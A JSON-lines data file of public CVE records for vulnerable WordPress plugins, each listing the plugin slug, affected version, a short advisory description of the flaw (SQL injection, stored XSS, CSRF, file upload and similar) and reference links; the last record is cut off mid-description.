{"CVE_ID":"CVE-2024-13618","slug":"aoa-downloadable","versionImpact":"0.1.0","description":"The aoa-downloadable WordPress plugin through 0.1.0 lacks authorization and authentication for requests to its download.php endpoint, allowing unauthenticated visitors to make requests to arbitrary URLs.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6a78233-3f23-4da4-9bc0-1439cde20a30\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6a78233-3f23-4da4-9bc0-1439cde20a30\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8085","slug":"peoplepond","versionImpact":"1.1.9","description":"The PeoplePond WordPress plugin through 1.1.9 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b43d3a2-4324-43fd-9c2a-90dbdc1d12a6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b43d3a2-4324-43fd-9c2a-90dbdc1d12a6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6783","slug":"gozen-forms","versionImpact":"1.1.5","description":"The GoZen Forms plugin for WordPress is vulnerable to SQL Injection via the 'forms-id' parameter of the emdedSc() function in all versions up to, and including, 1.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gozen-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gozen-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/784998a7-550d-4299-9995-af01e5ee1d21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/784998a7-550d-4299-9995-af01e5ee1d21?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1871","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the deleteLang function. This makes it possible for unauthenticated attackers to reset the plugin's quick language translation settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L505\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L505\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7ae863c-4638-49ab-bb1f-52346884c3aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7ae863c-4638-49ab-bb1f-52346884c3aa?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0584","slug":"vk-blocks","versionImpact":"1.57.0.5","description":"The VK Blocks plugin for WordPress is vulnerable to improper authorization via the REST 'update_options' function in versions up to, and including, 1.57.0.5. This allows authenticated attackers, with contributor-level permissions or above, to change the 'vk_font_awesome_version' option to an arbitrary value.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/font-awesome\\\/class-vk-blocks-font-awesome-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/font-awesome\\\/class-vk-blocks-font-awesome-api.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b90b7f6c-df7f-48a5-b283-cf5facbd71e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b90b7f6c-df7f-48a5-b283-cf5facbd71e5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2359","slug":"revslider","versionImpact":"6.6.12","description":"The Slider Revolution WordPress plugin through 6.6.12 does not check for valid image files upon import, leading to an arbitrary file upload which may be escalated to Remote Code Execution in some server configurations.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8350890-e6d4-4b04-a158-2b0ee3748e65\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8350890-e6d4-4b04-a158-2b0ee3748e65\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4139","slug":"wp-ultimate-csv-importer","versionImpact":"7.9.8","description":"The WP Ultimate CSV Importer plugin for WordPress is vulnerable to Sensitive Information Exposure  via Directory Listing due to missing restriction in export folder indexing in versions up to, and including, 7.9.8. This makes it possible for unauthenticated attackers to list and view exported files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6404476e-0c32-4f8e-882f-6a1785ba5748?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6404476e-0c32-4f8e-882f-6a1785ba5748?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5640","slug":"article-analytics","versionImpact":"1.0","description":"The Article Analytics WordPress plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection vulnerability.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a383ef5-0f1a-4894-8f78-845abcb5062d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a383ef5-0f1a-4894-8f78-845abcb5062d\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/devl00p.github.io\\\/posts\\\/Injection-SQL-dans-le-plugin-Wordpress-Article-Analytics\\\/\",\"name\":\"https:\\\/\\\/devl00p.github.io\\\/posts\\\/Injection-SQL-dans-le-plugin-Wordpress-Article-Analytics\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0984","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the disableOptimization function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to disable the image optimization setting.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0858","slug":"innovs-hr-manager","versionImpact":"1.0.3.4","description":"The Innovs HR WordPress plugin through 1.0.3.4 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as adding them as employees.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6627a35-d158-495e-9d56-69405cfca221\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6627a35-d158-495e-9d56-69405cfca221\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0632","slug":"auto-translate","versionImpact":"1.5.4","description":"The Automatic Translator with Google Translate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom font setting in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4727154c-c48f-4958-9520-cc5204927ee4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4727154c-c48f-4958-9520-cc5204927ee4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-translate\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-translate\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6220","slug":"keydatas","versionImpact":"2.5.2","description":"The ????? (Keydatas) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the keydatas_downloadImages function in all versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ae7971-7bdf-4369-b04b-fb48ea5b9518?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ae7971-7bdf-4369-b04b-fb48ea5b9518?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/keydatas\\\/trunk\\\/keydatas.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/keydatas\\\/trunk\\\/keydatas.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3399","slug":"cookie-notice","versionImpact":"2.4.17.1","description":"The Cookie Notice & Compliance for GDPR \/ CCPA plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cookie_notice_options[refuse_code_head]' parameter in versions up to, and including, 2.4.17.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrative privileges and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected \/wp-admin\/admin.php?page=cookie-notice page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73fd35b4-16b3-4f57-a3e4-46e4de0ee822?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73fd35b4-16b3-4f57-a3e4-46e4de0ee822?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134120\\\/cookie-notice\\\/trunk\\\/includes\\\/settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134120\\\/cookie-notice\\\/trunk\\\/includes\\\/settings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3459","slug":"woocommerce-multiple-free-gift","versionImpact":"1.2.3","description":"The WooCommerce Multiple Free Gift plugin for WordPress is vulnerable to gift manipulation in all versions up to, and including, 1.2.3. This is due to plugin not enforcing server-side checks on the products that can be added as a gift. This makes it possible for unauthenticated attackers to add non-gift items to their cart as a gift.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb9c321-1a2c-4593-9947-2071a908ee1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb9c321-1a2c-4593-9947-2071a908ee1c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multiple-free-gift\\\/trunk\\\/lib\\\/WFG_Frontend.class.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multiple-free-gift\\\/trunk\\\/lib\\\/WFG_Frontend.class.php#L189\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11747","slug":"responsive-youtube-videos","versionImpact":"2.1","description":"The Responsive Videos plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'somryv' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-youtube-videos\\\/trunk\\\/includes\\\/somryv-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-youtube-videos\\\/trunk\\\/includes\\\/somryv-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-youtube-videos\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-youtube-videos\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f723be00-79f1-4a24-8502-2c5844ccc5de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f723be00-79f1-4a24-8502-2c5844ccc5de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13231","slug":"uber-grid","versionImpact":"1.1.7","description":"The WordPress Portfolio Builder \u2013 Portfolio Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'add_video' function in all versions up to, and including, 1.1.7. This makes it possible for unauthenticated attackers to add arbitrary videos to any portfolio gallery.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28d9ab98-c1ab-45ee-a371-6598a8347b10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28d9ab98-c1ab-45ee-a371-6598a8347b10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1672","slug":"notibar","versionImpact":"2.1.5","description":"The Notibar \u2013 Notification Bar for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246799\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246799\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notibar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notibar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9985627d-9ba4-4a5b-94fb-06bcc769acfd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9985627d-9ba4-4a5b-94fb-06bcc769acfd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13617","slug":"aoa-downloadable","versionImpact":"0.1.0","description":"The aoa-downloadable WordPress plugin through 0.1.0 doesn't validate a parameter in its download function, allowing unauthenticated attackers to download arbitrary files from the server","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d6dd979-21ef-4d14-9c42-bbd1d7b65c53\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d6dd979-21ef-4d14-9c42-bbd1d7b65c53\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13926","slug":"wp-syntax","versionImpact":"1.2","description":"The WP-Syntax WordPress plugin through 1.2 does not properly handle input, allowing an attacker to create a post containing a large number of tags, thereby exploiting a catastrophic backtracking issue in the regular expression processing to cause a DoS.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5f0092e-7cd5-412f-a8ea-7bd4a8bf86d2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5f0092e-7cd5-412f-a8ea-7bd4a8bf86d2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8082","slug":"widgets-reset","versionImpact":"0.1","description":"The Widgets Reset WordPress plugin through 0.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47b2cd60-9ac4-49cf-8ca9-7d90656fc397\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47b2cd60-9ac4-49cf-8ca9-7d90656fc397\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6782","slug":"gozen-forms","versionImpact":"1.1.5","description":"The GoZen Forms plugin for WordPress is vulnerable to SQL Injection via the 'forms-id' parameter of the dirGZActiveForm() function in all versions up to, and including, 1.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gozen-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gozen-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d874a041-1cd4-4ca1-85bd-4050630d8502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d874a041-1cd4-4ca1-85bd-4050630d8502?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1870","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the saveLang function. This makes it possible for unauthenticated attackers to change the plugin's quick language translation settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1cec0b1-b77c-4d21-a3d2-c79fd3250bb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1cec0b1-b77c-4d21-a3d2-c79fd3250bb0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L498\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L498\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0583","slug":"vk-blocks","versionImpact":"1.57.0.5","description":"The VK Blocks plugin for WordPress is vulnerable to improper authorization via the REST 'update_vk_blocks_options' function in versions up to, and including, 1.57.0.5. This allows authenticated attackers, with contributor-level permissions or above, to change plugin settings including default icons.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/App\\\/RestAPI\\\/BlockMeta\\\/class-vk-blocks-entrypoint.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/App\\\/RestAPI\\\/BlockMeta\\\/class-vk-blocks-entrypoint.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12a94f5b-bc30-4a65-b397-54488c836ec3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12a94f5b-bc30-4a65-b397-54488c836ec3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0983","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the enableOptimization function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to enable image optimization.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6487","slug":"luckywp-table-of-contents","description":"The LuckyWP Table of Contents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Header Title' field in all versions up to and including 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88075c15-079f-4de2-8e15-374eb7b8c77b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88075c15-079f-4de2-8e15-374eb7b8c77b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/luckywp-table-of-contents\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/luckywp-table-of-contents\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7703","slug":"armember-membership","versionImpact":"4.0.37","description":"The ARMember \u2013 Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.0.37 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bd057d5-5350-43c9-abfc-34d8f6537d2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bd057d5-5350-43c9-abfc-34d8f6537d2e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_members_activity.php#L374\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_members_activity.php#L374\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/armember-membership\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/armember-membership\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136475\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136475\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8747","slug":"email-obfuscate-shortcode","versionImpact":"2.0","description":"The Email Obfuscate Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'email-obfuscate' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 